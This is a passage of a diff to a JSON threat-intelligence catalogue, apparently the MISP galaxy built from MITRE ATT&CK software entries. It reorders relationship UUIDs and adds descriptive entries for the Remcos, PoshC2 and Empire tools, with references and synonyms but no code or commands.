@@ -2093,77 +2172,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2177,7 +2186,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2191,14 +2200,42 @@ "type": "uses" }, { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2212,14 +2249,56 @@ "type": "uses" }, { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2233,7 +2312,14 @@ "type": "uses" }, { - "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2300,6 +2386,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d8d19e33-94fd-4aa3-b94a-08ee801a2153", @@ -2409,62 +2502,6 @@ ] }, "related": [ - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", "tags": [ 
@@ -2473,7 +2510,14 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2494,14 +2538,63 @@ "type": "uses" }, { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2538,6 +2631,365 @@ "uuid": "33b9e38f-103c-412d-bdcf-904a91fff1e4", "value": "spwebmember - S0227" }, + { + "description": "[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)", + "meta": { + "external_id": "S0332", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0332", + "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", + "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html" + ], + "synonyms": [ + "Remcos" + ] + }, + "related": [ + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "7cd0bc75-055b-4098-a00e-83dc8beaff14", + "value": "Remcos - S0332" + }, + { + "description": "[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1086). 
Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)", + "meta": { + "external_id": "S0378", + "mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0378", + "https://github.com/nettitude/PoshC2" + ], + "synonyms": [ + "PoshC2" + ] + }, + "related": [ + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "4b57c098-f043-4da2-83ef-7588a6d426bc", + "value": "PoshC2 - S0378" + }, { "description": "[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)", "meta": { @@ -2583,14 +3035,14 @@ "type": "uses" }, { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2606,7 +3058,671 @@ ], "uuid": "da21929e-40c0-443d-bdf4-6b60d15448b4", "value": "Xbot - S0298" + }, + { + "description": "[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1086) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)\n\n", + "meta": { + "external_id": "S0363", + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0363", + "https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf", + "https://github.com/PowerShellEmpire/Empire", + "https://github.com/dstepanic/attck_empire" + ], + "synonyms": [ + "Empire", + "EmPyre", + "PowerShell Empire" + ] + }, + "related": [ + { + "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6c174520-beea-43d9-aac6-28fb77f3e446", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + 
